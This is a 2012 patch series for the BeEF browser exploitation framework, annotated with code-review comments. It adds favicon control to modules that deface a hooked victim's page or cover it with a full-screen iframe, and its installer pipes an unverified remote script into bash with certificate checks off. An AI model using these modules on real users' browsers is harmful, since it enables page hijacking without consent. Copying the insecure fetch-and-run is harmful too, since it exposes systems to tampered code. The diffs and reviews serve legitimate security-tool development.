From 1335f57a4664876f6b836822d2c233ae5db47623 Mon Sep 17 00:00:00 2001
From: bcoles
Date: Mon, 14 May 2012 20:29:18 +0930
Subject: [PATCH 1/4] Browser plugins are now passed through unique()
---
core/main/client/browser.js | 54 +++++++++++++++++++++----------------
1 file changed, 31 insertions(+), 23 deletions(-)
diff --git a/core/main/client/browser.js b/core/main/client/browser.js
index 321d5f0c4..53d6505e5 100644
--- a/core/main/client/browser.js
+++ b/core/main/client/browser.js
@@ -597,29 +597,37 @@ return !!window.history.replaceState && window.navigator.userAgent.match(/Firefo * Returns the list of plugins installed in the browser. */ getPlugins: function() { - var results = ''; - if (this.isIE()) - { - results = this.getPluginsIE(); - } else { - if (navigator.plugins && navigator.plugins.length > 0) - { - var length = navigator.plugins.length; - for (var i=0; i < length; i++) - { - if (i != 0) - results += '\n'; - if(beef.browser.isFF()){ //FF returns exact plugin versions - results += navigator.plugins[i].name + '-v.' + navigator.plugins[i].version; - }else{ // Webkit and Presto (Opera) doesn't support the version attribute, and - // sometimes they store plugin version in description (Real, Adobe) - results += navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description; - } - } - } else { - results = 'navigator.plugins is not supported in this browser!'; - } - } + + var results; + Array.prototype.unique = function() { + var o = {}, i, l = this.length, r = []; + for(i=0; i 0) { + results = new Array(); + for (var i=0; i < navigator.plugins.length; i++) { + + // Firefox returns exact plugin versions + if (beef.browser.isFF()) results[i] = navigator.plugins[i].name + '-v.' + navigator.plugins[i].version; + + // Webkit and Presto (Opera) + // Don't support the version attribute + // Sometimes store the version in description (Real, Adobe) + else results[i] = navigator.plugins[i].name;// + '-desc.' + navigator.plugins[i].description; + } + results = results.unique().toString(); + + // All browsers that don't support navigator.plugins + } else results = 'navigator.plugins is not supported in this browser!'; + + // Return results return results; }, From b9c9df93e1fd36aa15dc917fe4942a225f7f6bdc Mon Sep 17 00:00:00 2001 
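Review bot: `Array.prototype.unique = function() {…}` is assigned inside `getPlugins`, so every call patches the built-in Array prototype of the page the script runs in and adds an enumerable `unique` key that appears in any `for…in` over an array. A function-local helper avoids that, for example `var unique = function(arr) {…};` used as `results = unique(results).join('\n');`. The `join('\n')` matters as well: the new `results.unique().toString()` separates entries with `,` where the removed code used `'\n'`, so a consumer that splits on newlines, or a plugin name containing a comma, is now parsed differently. The loop in the middle of this hunk is truncated on the page, so whether the `getPluginsIE()` branch survives cannot be confirmed from here.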
From: Ben Waugh Date: Tue, 15 May 2012 18:27:35 +1000 Subject: [PATCH 2/4] Updated Installer Script Improved Debian/Ubuntu installer Added Disclaimer Message/Opt Out --- install-beef | 37 ++++++++++++++++++++++++++++++------- 1 file changed, 30 insertions(+), 7 deletions(-) diff --git a/install-beef b/install-beef index 2c2401b20..2669588ff 100644 --- a/install-beef +++ b/install-beef @@ -18,6 +18,17 @@ clear echo "======================================" echo " BeEF Installer " echo "======================================" +echo "" + +echo "CAUTION: This installation script will install a number of BeEF dependencies including the Ruby-RVM environemnt and it's dependencies." +echo "" +echo "In rare cases, this may lead to unexpected behaviour or package conflicts on some systems." +echo "" +read -p "Are you sure you wish to continue (Y/n)? " +if [ "`echo ${REPLY} | tr [:upper:] [:lower:]`" == "n" ] ; then + exit; +fi + echo "" echo "Detecting OS.."; @@ -52,7 +63,6 @@ if [ "$OS" == "Darwin" ]; then bundle install OK="yes" - cd beef ./beef echo "" 
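Review bot: The opt-out test in the disclaimer block added at the top of install-beef only stops the script when the reply is exactly `n` or `N`; an answer such as `no` falls through and the package installation proceeds. `tr [:upper:] [:lower:]` and `${REPLY}` are also unquoted, so the shell can glob-expand the bracket expressions against single-character file names in the working directory before `tr` sees them. A `case` on the quoted reply covers both problems: `case "$REPLY" in [nN]*) exit 0 ;; esac`. The prompt text has two typos worth fixing in the same pass (`environemnt`, `it's dependencies`).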
@@ -69,17 +79,31 @@ if [ "$Distro" == "Debian" ]; then echo "Debian/Ubuntu Detected" echo "Installing Prerequisite Packages.." sudo apt-get update - sudo apt-get install ruby1.9.1-dev build-essential libsqlite3-ruby libsqlite3-dev build-essential libsqlite3-ruby git libsqlite3-dev rake + sudo apt-get install curl git + + + +sudo apt-get install build-essential openssl libreadline6 libreadline6-dev zlib1g zlib1g-dev libssl-dev libyaml-dev libsqlite3-0 libsqlite3-dev sqlite3 libxml2-dev libxslt1-dev autoconf libc6-dev libncurses5-dev automake libtool bison subversion + +bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer) + +echo '[[ -s "$HOME/.rvm/scripts/rvm" ]] && . "$HOME/.rvm/scripts/rvm"' >> ~/.bashrc + +source ~/.bashrc +source $HOME/.rvm/scripts/rvm + + rvm install 1.9.2 + rvm use 1.9.2 --default echo "Downloading BeEF.." git clone git://github.com/beefproject/beef.git cd beef echo "Installing Ruby Gems" - sudo gem install bundler - sudo bundle install + gem install bundler + bundle install + - cd beef ./beef OK="yes" @@ -115,7 +139,6 @@ if [ "$Distro" == "RedHat" ]; then source ~/.bash_profile - cd beef ./beef OK="yes" @@ -128,7 +151,7 @@ if [ "$Distro" == "RedHat" ]; then fi if [ "$OK" == "yes" ]; then - +echo "" else echo "" echo "=======================================" From 594e745694aa0efc1b7e0897b0b437f50796e0b9 Mon Sep 17 00:00:00 2001 
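Review bot: The Debian/Ubuntu branch (hunk `@@ -69,17 +79,31 @@`) now runs `bash < <(curl -sk https://raw.github.com/wayneeseguin/rvm/master/binscripts/rvm-installer)`, and `-k` turns off TLS certificate verification, so whatever answers that request is executed as the installing user with no integrity check. Fetching from `master` also means the script content can change between runs. Drop `-k`, download from a pinned tag or commit to a temporary file, compare it with a known digest, and only then execute it, e.g. `curl -fsSL -o "$tmp" "$RVM_INSTALLER_URL"`, then `echo "<EXPECTED_SHA256>  $tmp" | sha256sum -c -`, then `bash "$tmp"` (the URL variable and digest are placeholders). The `git clone git://github.com/beefproject/beef.git` context line has the same exposure because the `git://` transport is unauthenticated; an `https://` URL is the safer default. None of the added `sudo apt-get install`, `source` or `rvm` lines is followed by an exit-status check, so a failed step still proceeds to `./beef`.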
From: bcoles Date: Tue, 15 May 2012 17:47:05 +0930 Subject: [PATCH 3/4] Added favicon support to deface_web_page and site_redirect_iframe modules Fixes issue #491 --- modules/browser/hooked_domain/deface_web_page/command.js | 3 +++ modules/browser/hooked_domain/deface_web_page/config.yaml | 2 +- modules/browser/hooked_domain/deface_web_page/module.rb | 4 ++++ modules/browser/hooked_domain/site_redirect_iframe/command.js | 2 ++ .../browser/hooked_domain/site_redirect_iframe/config.yaml | 2 +- modules/browser/hooked_domain/site_redirect_iframe/module.rb | 4 ++++ 6 files changed, 15 insertions(+), 2 deletions(-) diff --git a/modules/browser/hooked_domain/deface_web_page/command.js b/modules/browser/hooked_domain/deface_web_page/command.js index 1c43fa298..feff12512 100644 --- a/modules/browser/hooked_domain/deface_web_page/command.js +++ b/modules/browser/hooked_domain/deface_web_page/command.js @@ -14,7 +14,10 @@ // limitations under the License. // beef.execute(function() { + document.body.innerHTML = "<%= @deface_content %>"; + document.title = "<%= @deface_title %>"; + beef.browser.changeFavicon("<%= @deface_favicon %>"); beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Deface Successful"); }); diff --git a/modules/browser/hooked_domain/deface_web_page/config.yaml b/modules/browser/hooked_domain/deface_web_page/config.yaml index dad8c8070..22e8fdd4d 100644 --- a/modules/browser/hooked_domain/deface_web_page/config.yaml +++ b/modules/browser/hooked_domain/deface_web_page/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: ["Browser","Hooked Domain"] name: "Replace Content (Deface)" - description: "Overwrite the body of the page the hooked browser is on with the 'Deface Content' string." + description: "Overwrite the page, title and shortcut icon on the hooked page." authors: ["antisnatchor"] target: user_notify: ['ALL'] 
diff --git a/modules/browser/hooked_domain/deface_web_page/module.rb b/modules/browser/hooked_domain/deface_web_page/module.rb index d624577d8..ec5affdfc 100644 --- a/modules/browser/hooked_domain/deface_web_page/module.rb +++ b/modules/browser/hooked_domain/deface_web_page/module.rb @@ -16,7 +16,11 @@ class Deface_web_page < BeEF::Core::Command def self.options + configuration = BeEF::Core::Configuration.instance + favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico" return [ + { 'name' => 'deface_title', 'description' => 'Page Title', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' }, + { 'name' => 'deface_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' }, { 'name' => 'deface_content', 'description' => 'Your defacement content', 'ui_label'=>'Deface Content', 'type' => 'textarea', 'value' =>'BeEF!', 'width' => '400px', 'height' => '100px' } ] end diff --git a/modules/browser/hooked_domain/site_redirect_iframe/command.js b/modules/browser/hooked_domain/site_redirect_iframe/command.js index 2a0c1a59f..f707b25f7 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/command.js +++ b/modules/browser/hooked_domain/site_redirect_iframe/command.js @@ -18,6 +18,7 @@ beef.execute(function() { var result = 'Iframe successfully created!'; var title = '<%= @iframe_title %>'; var iframe_src = '<%= @iframe_src %>'; + var iframe_favicon = '<%= @iframe_favicon %>'; var sent = false; $j("iframe").remove(); 
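Review bot: The two lines that build `favicon_uri` in `Deface_web_page.options` are repeated verbatim in `Site_redirect_iframe.options` in the last hunk of this patch, so any later change to the scheme, path or config keys has to be made twice. A single helper on the shared base class (or on the configuration object) that returns the default icon URI would keep the modules in sync. The default also deserves a comment, since it is not obvious from the option list that the value points back at this server: `# Default icon is served by this BeEF instance; the URI exposes its host and port to the hooked page.` The `options` method body continues outside the hunk.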
@@ -25,6 +26,7 @@ beef.execute(function() { beef.dom.createIframe('fullscreen', 'get', {'src':iframe_src}, {}, function() { if(!sent) { sent = true; document.title = title; beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+result); } }); document.body.scroll = "no"; document.documentElement.style.overflow = 'hidden'; + beef.browser.changeFavicon(iframe_favicon); setTimeout(function() { if(!sent) { diff --git a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml index 1cc2d82bf..9e5d349c3 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/config.yaml +++ b/modules/browser/hooked_domain/site_redirect_iframe/config.yaml @@ -19,7 +19,7 @@ beef: enable: true category: ["Browser","Hooked Domain"] name: "Redirect Browser (iFrame)" - description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title and the time delay are specified in the parameters below.

The content of the URL bar will not be changed in the hooked browser." + description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.

The content of the URL bar will not be changed in the hooked browser." authors: ["ethicalhack3r", "Yori Kvitchko"] target: user_notify: ["ALL"] diff --git a/modules/browser/hooked_domain/site_redirect_iframe/module.rb b/modules/browser/hooked_domain/site_redirect_iframe/module.rb index 9d7860f51..8ca97afa1 100644 --- a/modules/browser/hooked_domain/site_redirect_iframe/module.rb +++ b/modules/browser/hooked_domain/site_redirect_iframe/module.rb @@ -16,8 +16,12 @@ class Site_redirect_iframe < BeEF::Core::Command def self.options + configuration = BeEF::Core::Configuration.instance + favicon_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/ui/media/images/favicon.ico" return [ { 'name' => 'iframe_title', 'description' => 'Title of the iFrame', 'ui_label' => 'New Title', 'value' => 'BeEF - The Browser Exploitation Framework Project', 'width'=>'200px' }, + { 'name' => 'iframe_favicon', 'description' => 'Shortcut Icon', 'ui_label' => 'New Favicon', 'value' => favicon_uri, 'width'=>'200px' }, + { 'name' => 'iframe_src', 'description' => 'Source of the iFrame', 'ui_label' => 'Redirect URL', 'value' => 'http://beefproject.com/', 'width'=>'200px' }, { 'name' => 'iframe_timeout', 'description' => 'iFrame timeout', 'ui_label' => 'Timeout', 'value' => '3500', 'width'=>'150px' } ] From f0b1d6d76fb0b508267442f6a943398edfbfab3e Mon Sep 17 00:00:00 2001 From: Ben Waugh Date: Wed, 16 May 2012 07:51:56 +1000 Subject: [PATCH 4/4] Updated CDE Generator UpdatedCan be run with: rake cde --- Rakefile | 28 +++++++++++++++++++++++++--- 1 file changed, 25 insertions(+), 3 deletions(-) diff --git a/Rakefile b/Rakefile index 4e736b699..adb1a8d14 100644 --- a/Rakefile +++ b/Rakefile 
@@ -165,10 +165,32 @@ task :cde do sh "make"; Dir.chdir ".."; puts "\nCreating CDE Package...\n"; - sh "./CDE/cde ruby beef"; - sleep (1); + sh "bundle install" + Rake::Task['cde_beef_start'].invoke + Rake::Task['beef_stop'].invoke puts "\nCleaning Up...\n"; - sh "rm -r CDE"; + sleep (2); + sh "rm -rf CDE"; puts "\nCDE Package Created...\n"; end +################################ +# CDE/BeEF environment set up + +@beef_process_id = nil; + +task :cde_beef_start => 'beef' do + printf "Starting CDE BeEF (wait 10 seconds)..." + @beef_process_id = IO.popen("./CDE/cde ruby beef -x 2> /dev/null", "w+") + delays = [2, 2, 1, 1, 1, 0.5, 0.5 , 0.5, 0.3, 0.2, 0.1, 0.1, 0.1, 0.05, 0.05] + delays.each do |i| # delay for 10 seconds + printf '.' + sleep (i) + end + puts '.' +end + + +################################ + +
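Review bot: `@beef_process_id` in the new `cde_beef_start` task is assigned the `IO` object returned by `IO.popen`, not a process id; if `beef_stop` (defined outside this hunk) passes it to `Process.kill` it needs `@beef_process_id.pid`, so either store `.pid` or rename the variable. The `2> /dev/null` redirect discards any start-up error, and the fixed `delays` list (about 9.4 seconds in total, although the message says 10) stands in for a readiness check, so `beef_stop` and `rm -rf CDE` run whether or not the process actually came up. The pipe is opened `w+` but is never read or closed in the visible lines. If the intent is only to let CDE trace one BeEF start-up, a one-line comment above the task saying so would explain the start-then-stop sequence in `:cde`.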